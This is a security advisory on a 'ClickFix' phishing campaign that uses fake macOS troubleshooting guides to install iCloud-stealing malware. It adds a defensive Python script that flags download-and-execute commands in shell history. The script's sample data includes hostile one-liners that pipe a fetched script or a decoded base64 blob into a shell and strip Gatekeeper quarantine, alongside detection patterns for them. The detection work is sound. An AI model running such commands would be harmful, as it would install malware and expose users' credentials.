Fake macOS Troubleshooting Sites Deployed by ClickFix Campaign Steal iCloud Credentials from macOS Users
What Happened — Microsoft researchers uncovered a new “ClickFix” phishing campaign that publishes bogus macOS troubleshooting guides on platforms such as Medium and Craft. Victims are instructed to copy‑paste Terminal commands that silently install the AMOS and SHub stealer malware, which harvests iCloud authentication tokens and other personal data.
Why It Matters for TPRM —
- Threat actors exploit trusted content platforms to reach employees, increasing the likelihood of successful credential theft.
- Compromised iCloud accounts can expose corporate documents, internal communications, and SaaS credentials stored in Apple’s ecosystem.
- The campaign demonstrates a supply‑chain‑like abuse of third‑party publishing services, highlighting the need for strict content‑verification controls.
Who Is Affected — All organizations with macOS users, especially those that rely on iCloud for file sync, device management, or authentication (technology, professional services, education, media, etc.).
Recommended Actions —
- Instruct macOS users to verify the authenticity of any troubleshooting guide before executing Terminal commands.
- Enforce least‑privilege policies and disable execution of unsigned scripts where possible.
- Deploy endpoint detection that flags the AMOS/SHub binaries and monitor for anomalous iCloud token usage.
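As an added example for the detection recommendation above (this is not code from the original advisory, Microsoft, or HackRead), the script below scans a user's shell history for the shape of command a "paste this into Terminal" guide typically asks for: a remote fetch or a base64 decode piped straight into a shell, or removal of the Gatekeeper quarantine attribute. The regexes, the `~/.zsh_history` source and the sample lines are assumptions and constructed data, not indicators published for this campaign; treat hits as triage leads for the endpoint team, not proof of compromise.

```python
"""Flag ClickFix-style "paste this into Terminal" one-liners in shell history.

Added example for the advisory's detection recommendation; not code from the
advisory, Microsoft, or HackRead. The rules below are generic shapes of
download-and-execute commands (an assumption about what such guides contain),
not indicators published for this specific campaign.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# Extended zsh history lines look like ": 1700000000:0;<command>".
_ZSH_EXT = re.compile(r"^:\s*\d+:\d+;")

# Rule name -> pattern. Each describes a command shape a legitimate
# troubleshooting guide has no reason to ask a user to run.
RULES = {
    # curl/wget output piped straight into an interpreter
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;\n]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    # base64 blob decoded and piped into an interpreter (hides the real URL)
    "base64_decode_piped_to_shell": re.compile(
        r"base64\s+(-d|-D|--decode)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
    # Gatekeeper quarantine attribute stripped from a downloaded file
    "quarantine_attribute_removed": re.compile(
        r"\bxattr\b[^;\n]*com\.apple\.quarantine"),
}


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    command: str


def normalize(line: str) -> str:
    """Strip the extended-history prefix and surrounding whitespace."""
    return _ZSH_EXT.sub("", line).strip()


def scan_history(lines: Iterable[str]) -> list[Finding]:
    """Return one Finding per (line, rule) match, in file order."""
    findings: list[Finding] = []
    for n, raw in enumerate(lines, start=1):
        cmd = normalize(raw)
        if not cmd or cmd.startswith("#"):
            continue
        for rule, pat in RULES.items():
            if pat.search(cmd):
                findings.append(Finding(n, rule, cmd))
    return findings


def risk_level(findings: list[Finding]) -> str:
    """Crude triage: obfuscated execution or quarantine removal ranks high."""
    rules = {f.rule for f in findings}
    if not rules:
        return "none"
    if rules & {"base64_decode_piped_to_shell", "quarantine_attribute_removed"}:
        return "high"
    return "medium"


# Constructed sample: a ~/.zsh_history after a user followed a fake guide.
# "QUJDREVG" is just base64 of "ABCDEF"; a real lure would hide a fetch here.
SAMPLE_HISTORY = [
    ": 1700000000:0;brew update",
    ": 1700000010:0;curl -I https://example.com",
    ": 1700000020:0;curl -s https://example.com/api | jq .",
    ': 1700000030:0;echo "QUJDREVG" | base64 -D | bash',
    ": 1700000040:0;curl -fsSL https://example.invalid/fix.sh | sh",
    ": 1700000050:0;xattr -d com.apple.quarantine ~/Downloads/Fix.app",
    ": 1700000060:0;ls -la",
]

if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for f in hits:
        print(f"line {f.line_no}: {f.rule}: {f.command}")
    print("risk:", risk_level(hits))
```

On a real fleet the same `scan_history` function can be fed `~/.zsh_history` or `~/.bash_history` collected by the EDR agent; the benign `curl -I` and `curl | jq` lines in the sample show why the rules key on "piped into a shell" rather than on `curl` alone.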
Technical Notes — Attack vector: phishing via fake “ClickFix” guides; malware delivered through legitimate‑looking Terminal commands; data exfiltrated includes iCloud authentication tokens, contacts, photos, and synced documents. Source: HackRead